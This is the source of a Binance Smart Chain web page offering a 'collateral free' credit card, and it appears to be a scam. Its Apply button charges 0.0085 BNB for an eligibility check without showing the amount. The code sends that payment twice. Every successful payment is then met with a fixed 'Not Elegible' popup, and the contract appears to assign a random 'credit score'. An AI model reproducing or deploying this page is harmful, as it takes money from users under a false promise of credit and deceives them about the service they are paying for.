<!DOCTYPE html>
<meta charset="UTF-8">

<html>
<head>
    <title>CFL Credit Card - Collateral Free Loan - Borrow Colletral Free Loan</title>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-R4TQB30FJW"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-R4TQB30FJW');
</script>

<link rel="icon" type="image/x-icon" href="icon.png">
<style>

body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
		text-align: center;
            background-color:  #89CFF0;
        }

        .header {
            background-color: #fff; /* White header background color */
            color: #333; /* Dark text color */
            padding: 20px 0;
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 12px;
        }

        .logo {
            max-width: 130px;
        }



#connect-wallet, #disconnect-wallet {
           background-color: #F50870FF;
            color: #fff;
            border: none;
            border-radius: 5px;
            padding: 10px 20px;
            font-size: 16px;
            cursor: pointer;
        }

#disconnect-wallet {
           background-color: grey;
}

#notification {
    font-size: 20px; /* Font size for the notification text */
    font-weight: bold; /* Bold text */
    padding: 10px; /* Padding around the notification text */
    color: white; /* Text color (red) */
    background-color: #333; /* Background color (greyish-black) */
    width: 50%; /* Set the width to 50% */
    margin: 10px auto; /* Center horizontally with equal margin on the left and right */
    border-radius: 10px; /* Rounded corners (adjust the value as needed) */
    position: relative; /* Allows positioning of the timer */
}

.main{
padding: 20px 20px 20px 20px;
		flex-basis: 400px;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
		background-color: white;
		margin : auto;
		width: 25%;
}

.main h3{
		
		font-size: 25px;

}

.main img{
		max-width: 80%;

}

        #apply-card {
            padding: 10px;
            font-size: 16px;
            cursor: pointer;
            background-color: #4caf50;
            color: #fff;
            border: none;
            border-radius: 4px;
        }

.popup {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.7);
            justify-content: center;
            align-items: center;
        }
        .popup-content {
            background-color: white;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
            position: relative;
        }
        .close-button {
            position: absolute;
            top: 10px;
            right: 10px;
            cursor: pointer;
        }


        .status {
            font-size: 24px;
            font-weight: bold;
            margin-bottom: 20px;
        }
        .processing {
            animation: spin 2s linear infinite;
        }
        #check-score {
            background-color: green;
            color: #fff;
            border: none;
            border-radius: 5px;
            padding: 10px 20px;
            font-size: 16px;
            cursor: pointer;
            margin-top: 20px;
        }


        .footer {
            background-color: #333;
            color: #fff;
            padding: 20px;
        }

        .footer-section {
            display: flex;
            
        }

        .footer-list {
            list-style: none;
text-align : left;
        }

        .page {
            cursor: pointer;
        }

        .footer-logo {
            display: flex;
  justify-content: space-between;
  align-items: center;
  background-color: #333; /* Background color for the footer */
  color: white; /* Text color for the footer */
  padding: 20px;

  margin-left: auto; /* Move the logo to the right */
  max-width: 200px; /* Set the maximum width for the logo */
  height: 50px; /* Maintain the aspect ratio while resizing */
        }



</style>
</head>
<body>

<div class="header">
<a href="home.html">
        <img src="logo.png" alt="Your Logo" align="left" class="logo"></a>
<b><p id="wallet-address"></p></b>
         <button id="connect-wallet"><b>Connect Wallet</b></button>
        <button id="disconnect-wallet" style="display: none;"><b>Disconnect Wallet</b></button>
    </div>

<div id="notification" style="background-color: transparent;"></div>

<br>

<div class="main">
	<h3>Apply Credit Card</h3>
<img src="cc.png" alt="Credit Card" class="cc"><br><br><br>
<button id="apply-card"><b>Apply</b></button><br><br>
<p style="font-size:80%; color:grey;"><b>Note :- You will be eligible based upon your credit score</b></p>
</div>


<br><br><br><br>
<!-- Popup windows -->

    <div class="popup" id="process-transaction-popup">
        <div class="popup-content">
            <span class="close-button" id="close-popup">X</span>
            <p class="status" id="popup-status">Approve Transaction</p>
            <p id="popup-message">You have to approve the transaction to check your eligibility.</p>
        </div>
    </div>


    <div class="popup" id="transaction-status">
        <div class="popup-content">
		<span class="close-button" id="close-status-popup">X</span>

            <h2>Not Elegible</h2>
 
            <b><p id="wallet-address"></p></b>

<p>Sorry !!! You are not matched with our eligibility criteria.</p>
	<button id="apply-card" class="popup-button" onclick="checkScore()"><b>Check Score</b></button>
        </div>
    </div>



<div class="footer">
        <div class="footer-section">
            <ul class="footer-list">
                <li class="page"><button onclick="window.location.href = '\home.html';" style="width: 100%; background-color:#F50870FF; color: white; font-size: 15px; border-radius: 5px; padding: 10px 20px; cursor: pointer;"><b>Launch Dapp</button></li>
                <br>
                <li class="page"><a href="about.html" style="text-decoration:none; color:white;">About</a></li>
                <li class="page"><a href="contact.html" style="text-decoration:none; color:white;">Contact</a></li>
                <li class="page"><a href="policy.html" style="text-decoration:none; color:white;">Privacy Policy</a></li></b>
            </ul>
            <ul class="footer-list">
                <b>
<br><br><br><br>
                <li class="page"><a href="ApplyCreditCard.html" style="text-decoration:none; color:white;">Credit Card</a></li>     
                <li class="page"><a href="CheckScore.html" style="text-decoration:none; color:white;">Check Score</a></li>               
</b>               
            </ul>

<div class="footer-logo">
<a href="home.html">
            <img src="logo.png" alt="Footer Logo" class="footer-logo"></a>
        </div>
        </div>
        
</div>


<script src="https://cdn.jsdelivr.net/npm/web3@1.5.2/dist/web3.min.js"></script>
 <script>

    // Initialize Web3.js
    const web3 = new Web3(Web3.givenProvider);

        const contractAddress = "0x3A493e88cc1239F3F1462ba1fa3e88b48A6AF039";
        const contractABI = [
	{
		"inputs": [],
		"name": "CheckCreditScore",
		"outputs": [],
		"stateMutability": "payable",
		"type": "function"
	},
	{
		"inputs": [
			{
				"internalType": "address",
				"name": "_initialFeeReceiver",
				"type": "address"
			}
		],
		"stateMutability": "nonpayable",
		"type": "constructor"
	},
	{
		"inputs": [
			{
				"internalType": "address",
				"name": "owner",
				"type": "address"
			}
		],
		"name": "OwnableInvalidOwner",
		"type": "error"
	},
	{
		"inputs": [
			{
				"internalType": "address",
				"name": "account",
				"type": "address"
			}
		],
		"name": "OwnableUnauthorizedAccount",
		"type": "error"
	},
	{
		"anonymous": false,
		"inputs": [
			{
				"indexed": true,
				"internalType": "address",
				"name": "wallet",
				"type": "address"
			},
			{
				"indexed": false,
				"internalType": "uint256",
				"name": "randomNumber",
				"type": "uint256"
			},
			{
				"indexed": false,
				"internalType": "uint256",
				"name": "timestamp",
				"type": "uint256"
			}
		],
		"name": "CreditScoreAssigned",
		"type": "event"
	},
	{
		"anonymous": false,
		"inputs": [
			{
				"indexed": true,
				"internalType": "address",
				"name": "payer",
				"type": "address"
			},
			{
				"indexed": false,
				"internalType": "uint256",
				"name": "amount",
				"type": "uint256"
			},
			{
				"indexed": false,
				"internalType": "uint256",
				"name": "timestamp",
				"type": "uint256"
			}
		],
		"name": "FeePaid",
		"type": "event"
	},
	{
		"anonymous": false,
		"inputs": [
			{
				"indexed": true,
				"internalType": "address",
				"name": "previousOwner",
				"type": "address"
			},
			{
				"indexed": true,
				"internalType": "address",
				"name": "newOwner",
				"type": "address"
			}
		],
		"name": "OwnershipTransferred",
		"type": "event"
	},
	{
		"inputs": [],
		"name": "renounceOwnership",
		"outputs": [],
		"stateMutability": "nonpayable",
		"type": "function"
	},
	{
		"inputs": [
			{
				"internalType": "address",
				"name": "newOwner",
				"type": "address"
			}
		],
		"name": "transferOwnership",
		"outputs": [],
		"stateMutability": "nonpayable",
		"type": "function"
	},
	{
		"inputs": [
			{
				"internalType": "uint256",
				"name": "_newFeeAmount",
				"type": "uint256"
			}
		],
		"name": "updateFeeAmount",
		"outputs": [],
		"stateMutability": "nonpayable",
		"type": "function"
	},
	{
		"inputs": [
			{
				"internalType": "address",
				"name": "_newFeeReceiver",
				"type": "address"
			}
		],
		"name": "updateFeeReceiver",
		"outputs": [],
		"stateMutability": "nonpayable",
		"type": "function"
	},
	{
		"inputs": [
			{
				"internalType": "uint256",
				"name": "_newMinTime",
				"type": "uint256"
			}
		],
		"name": "updateMinTimeBetweenRequests",
		"outputs": [],
		"stateMutability": "nonpayable",
		"type": "function"
	},
	{
		"inputs": [
			{
				"internalType": "address",
				"name": "",
				"type": "address"
			}
		],
		"name": "CreditScore",
		"outputs": [
			{
				"internalType": "uint256",
				"name": "",
				"type": "uint256"
			}
		],
		"stateMutability": "view",
		"type": "function"
	},
	{
		"inputs": [],
		"name": "feeAmount",
		"outputs": [
			{
				"internalType": "uint256",
				"name": "",
				"type": "uint256"
			}
		],
		"stateMutability": "view",
		"type": "function"
	},
	{
		"inputs": [],
		"name": "feeReceiver",
		"outputs": [
			{
				"internalType": "address",
				"name": "",
				"type": "address"
			}
		],
		"stateMutability": "view",
		"type": "function"
	},
	{
		"inputs": [],
		"name": "getRemainingTime",
		"outputs": [
			{
				"internalType": "uint256",
				"name": "",
				"type": "uint256"
			}
		],
		"stateMutability": "view",
		"type": "function"
	},
	{
		"inputs": [],
		"name": "getUsedAddresses",
		"outputs": [
			{
				"internalType": "address[]",
				"name": "",
				"type": "address[]"
			}
		],
		"stateMutability": "view",
		"type": "function"
	},
	{
		"inputs": [
			{
				"internalType": "address",
				"name": "",
				"type": "address"
			}
		],
		"name": "incrementCount",
		"outputs": [
			{
				"internalType": "uint256",
				"name": "",
				"type": "uint256"
			}
		],
		"stateMutability": "view",
		"type": "function"
	},
	{
		"inputs": [],
		"name": "minTimeBetweenRequests",
		"outputs": [
			{
				"internalType": "uint256",
				"name": "",
				"type": "uint256"
			}
		],
		"stateMutability": "view",
		"type": "function"
	},
	{
		"inputs": [],
		"name": "owner",
		"outputs": [
			{
				"internalType": "address",
				"name": "",
				"type": "address"
			}
		],
		"stateMutability": "view",
		"type": "function"
	},
	{
		"inputs": [
			{
				"internalType": "address",
				"name": "",
				"type": "address"
			}
		],
		"name": "timestamps",
		"outputs": [
			{
				"internalType": "uint256",
				"name": "",
				"type": "uint256"
			}
		],
		"stateMutability": "view",
		"type": "function"
	},
	{
		"inputs": [
			{
				"internalType": "uint256",
				"name": "",
				"type": "uint256"
			}
		],
		"name": "usedAddresses",
		"outputs": [
			{
				"internalType": "address",
				"name": "",
				"type": "address"
			}
		],
		"stateMutability": "view",
		"type": "function"
	}
];
        const contract = new web3.eth.Contract(contractABI, contractAddress);

        let walletConnected = false;

        document.getElementById('connect-wallet').addEventListener('click', async () => {
            try {
                const accounts = await ethereum.request({ method: 'eth_requestAccounts' });
        const networkId = await ethereum.request({ method: 'net_version' });
console.log(walletAddress = accounts[0]);
        // Check if the connected network is Binance Smart Chain (Mainnet or Testnet)
        if (networkId === '56' || networkId === '97') {
            const walletAddress = accounts[0];

                walletConnected = true;


                document.getElementById('wallet-address').textContent = "Wallet Address : " + accounts[0];

                document.getElementById('disconnect-wallet').style.display = 'inline';
                document.getElementById('connect-wallet').style.display = 'none';
           } else {

            // Display an error message if the connected network is not BSC
        flashNotification('Error: Connect to Binance Smart Chain', 'red');
        }
} catch (error) {
        flashNotification('Error connecting wallet', 'red');
            }
        });

        document.getElementById('disconnect-wallet').addEventListener('click', () => {
            ethereum.send('eth_requestAccounts').then(() => {
                walletConnected = false;
                document.getElementById('wallet-address').textContent = "";
                document.getElementById('connect-wallet').style.display = 'inline';
                document.getElementById('disconnect-wallet').style.display = 'none';
            });
        });

        function openPopup() {
            if (!walletConnected) {
                flashNotification('Connect wallet first', 'grey');
                return;
            }

            var popup = document.getElementById("process-transaction-popup");
            popup.style.display = "flex";
        }

        document.getElementById('close-popup').addEventListener('click', () => {
            document.getElementById('process-transaction-popup').style.display = 'none';
        });

        document.getElementById('close-status-popup').addEventListener('click', () => {
            document.getElementById('transaction-status').style.display = 'none';
        });

        function flashNotification(message, color) {
            const notification = document.getElementById('notification');
            notification.style.backgroundColor = color;
            notification.textContent = message;
            setTimeout(() => {
                notification.style.backgroundColor = 'transparent';
                notification.textContent = '';
            }, 3000);
        }

        document.getElementById('apply-card').addEventListener('click', async () => {
		if (!walletConnected) {
	                    flashNotification('Connect wallet first', 'grey');
	                    return;
	                }

		const accounts = await ethereum.request({ method: 'eth_requestAccounts' });
                const fromAddress = accounts[0];

		if (!fromAddress) {
	        flashNotification('Error: No wallet address found', 'red');
	        return;
	  	  }
            try {
		    
                document.getElementById('popup-status').textContent = 'Approve Transaction';
                document.getElementById('popup-message').textContent = `You have to approve the transaction to check your eligibility.`;
                document.getElementById("process-transaction-popup").style.display = "flex";
               
                const weiAmount = web3.utils.toWei('0.0085', 'ether');
                const gas = await contract.methods.CheckCreditScore().estimateGas({ value: weiAmount, from: fromAddress });
		    const result = await contract.methods.CheckCreditScore().send({ value: web3.utils.toWei('0.0085', 'ether'), from: fromAddress, gas });
                await contract.methods.CheckCreditScore().send({ from: fromAddress, value: weiAmount, gas });
                

                // If the transaction is successful, call the getRemainingTime function and start countdown
                if (result.status) {
                document.getElementById("transaction-status").style.display = "flex";
                document.getElementById('process-transaction-popup').style.display = 'none';
		}
            } catch (error) {
                document.getElementById('popup-status').textContent = 'Transaction Failed';
                document.getElementById('popup-message').textContent = `❌ Error: ${error.message}`;
            }
        });

function checkScore()
{
window.open("CheckScore.html");
}

</script>

</body>
<html>
